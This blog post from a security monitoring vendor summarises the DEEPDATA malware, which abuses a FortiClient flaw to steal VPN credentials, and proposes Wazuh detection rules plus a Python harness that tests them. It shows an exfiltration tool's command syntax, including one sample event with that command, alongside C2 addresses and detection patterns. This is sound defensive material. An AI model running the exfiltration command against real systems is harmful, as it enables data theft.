FortiClient Vulnerability in Windows Systems — Exploitation to Steal VPN Credentials via DEEPDATA

SOCFortress
2 min read · Nov 20, 2024


Need Help?

The functionality discussed in this post, and so much more, are available via the SOCFortress platform. Let SOCFortress help you and your team keep your infrastructure secure.

Website: https://www.socfortress.co/

Contact Us: https://www.socfortress.co/contact_form.html

Intro

Threat intelligence vendor Volexity published research Friday that referenced a new zero-day vulnerability — one without a current CVE designation — that has enabled threat actors tracked as “BrazenBamboo” to steal credentials in instances of Fortinet’s Windows VPN client, FortiClient.

Reference: https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/

In this article we propose Wazuh detection rules that alert on the artifacts and activity associated with this exploitation.

Malware Analysis

DEEPDATA post-exploitation tool

Volexity’s analysis began with the discovery of an archive file named deepdata[.]zip with the following file hash:

SHA256: 666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724

Detection rule:

  • Source: Wazuh Syscheck module
  • Rule ID: 554 (File added to the system.)

<rule id="xxxx" level="12">
<if_sid>554</if_sid>
<field name="sha256_after">^666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724$</field>
<description>Suspicious file added to the system.</description>
</rule>

The DEEPDATA malware elements include the following:

  • data.dll: DEEPDATA loader
  • mod.dat: DEEPDATA Virtual File System (VFS)
  • readme.txt: file containing the DEEPDATA execution options

Execution: the loader is launched through rundll32.exe with data.dll on the command line.

Detection rule:

  • Source: Sysmon Evt 1 (Process creation)
  • Process image + CMDLine
<rule id="xxxx" level="12">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.originalFileName" type="pcre2">(?i)rundll32\.exe</field>
<field name="win.eventdata.commandLine" type="pcre2">(?i)data\.dll</field>
<options>no_full_log</options>
<description>Suspicious rundll32 Execution</description>
</rule>

DEEPPOST post-exploitation exfiltration tool

Syntax:

localupload.exe c:\data_to_exfiltrate\ ip:port

Detection rule:

  • Source: Sysmon Evt 1 (Process creation)
  • Process image
<rule id="xxxx" level="12">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.originalFileName" type="pcre2">(?i)localupload\.exe</field>
<options>no_full_log</options>
<description>DeepPost Exfiltration Tool Detected</description>
</rule>

DEEPDATA C2 Infrastructure

Several C2 IP addresses mentioned in public reporting overlap with DEEPDATA infrastructure, including the following:

  • 103.27.109[.]217
  • 103.27.108[.]207
  • 121.201.109[.]98

Detection rule:

  • Source: Sysmon Evt 3 (Network Connection)
  • DST IPs + DST Ports
<rule id="xxxx" level="12">
<if_group>sysmon_event3</if_group>
<field name="win.eventdata.destinationIp" type="pcre2">^103\.27\.109\.217$|^103\.27\.108\.207$|^121\.201\.109\.98$</field>
<field name="win.eventdata.destinationPort" type="pcre2">^28443$|^28992$|^28993$</field>
<options>no_full_log</options>
<description>DEEPDATA C2 Connection Detected</description>
</rule>
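Before loading the three Sysmon rules above into Wazuh, it helps to check that their field logic fires only where intended (every `<field>` in a rule must match, and the port anchor keeps a connection to a listed IP on an unlisted port silent). The following Python example is added here and is not from the original post or from Wazuh; it replays the same patterns over constructed sample events, and the network rule is labelled as a C2 connection rather than reusing the DeepPost description.

```python
import re

# Each rule: (description, required <if_group>, {decoded field: pcre2 pattern}).
# Mirrors the <field> elements above; all fields must match (logical AND),
# and pcre2 <field> patterns are unanchored searches unless ^/$ is written.
RULES = [
    ("Suspicious rundll32 Execution", "sysmon_event1", {
        "win.eventdata.originalFileName": r"(?i)rundll32\.exe",
        "win.eventdata.commandLine": r"(?i)data\.dll"}),
    ("DeepPost Exfiltration Tool Detected", "sysmon_event1", {
        "win.eventdata.originalFileName": r"(?i)localupload\.exe"}),
    ("DEEPDATA C2 Connection Detected", "sysmon_event3", {
        "win.eventdata.destinationIp":
            r"^103\.27\.109\.217$|^103\.27\.108\.207$|^121\.201\.109\.98$",
        "win.eventdata.destinationPort": r"^28443$|^28992$|^28993$"}),
]

def matching_rules(event):
    """Return descriptions of all rules whose group and every field match."""
    return [desc for desc, group, fields in RULES
            if event.get("group") == group
            and all(re.search(pat, event.get(f, "")) for f, pat in fields.items())]

# Constructed sample events (not real telemetry), flattened the way Wazuh
# exposes decoded Sysmon fields; "group" stands in for the rule <if_group>.
SAMPLE_EVENTS = [
    {"group": "sysmon_event1", "win.eventdata.originalFileName": "RUNDLL32.EXE",
     "win.eventdata.commandLine": r"rundll32.exe C:\Users\Public\data.dll,Start"},
    {"group": "sysmon_event1", "win.eventdata.originalFileName": "RUNDLL32.EXE",
     "win.eventdata.commandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"group": "sysmon_event1", "win.eventdata.originalFileName": "localupload.exe",
     "win.eventdata.commandLine": r"localupload.exe c:\data_to_exfiltrate\ 192.0.2.10:28443"},
    {"group": "sysmon_event3", "win.eventdata.destinationIp": "103.27.109.217",
     "win.eventdata.destinationPort": "28443"},
    {"group": "sysmon_event3", "win.eventdata.destinationIp": "103.27.109.217",
     "win.eventdata.destinationPort": "443"},  # listed IP, unlisted port: no alert
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(matching_rules(ev) or "no alert")
```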



Written by SOCFortress

SOCFortress is a SaaS company that unifies Observability, Security Monitoring, Threat Intelligence and Security Orchestration, Automation, and Response (SOAR).